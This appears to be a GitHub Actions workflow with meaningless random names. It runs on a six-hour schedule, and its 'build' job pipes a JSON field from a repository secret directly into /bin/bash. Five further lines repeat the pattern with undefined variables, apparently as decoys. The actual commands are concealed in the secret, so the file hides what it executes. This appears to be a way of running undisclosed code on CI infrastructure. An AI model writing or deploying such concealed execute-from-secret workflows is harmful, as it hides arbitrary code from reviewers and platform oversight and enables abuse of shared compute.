name: gowncousin

on:
  workflow_dispatch:
  schedule:
    - cron: '3 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gowncousin
        env:
          da1253: ${{ secrets.da1253 }}
        run: |
          echo $da1253 | jq -r .sgp00531 | /bin/bash
          echo $w396 | jq -r .xxrao4 | /bin/bash
          echo $xj3 | jq -r .wejif99103 | /bin/bash
          echo $btaav129 | jq -r .pqe49 | /bin/bash
          echo $fpg3 | jq -r .z7 | /bin/bash
          echo $l66837 | jq -r .tmf144 | /bin/bash

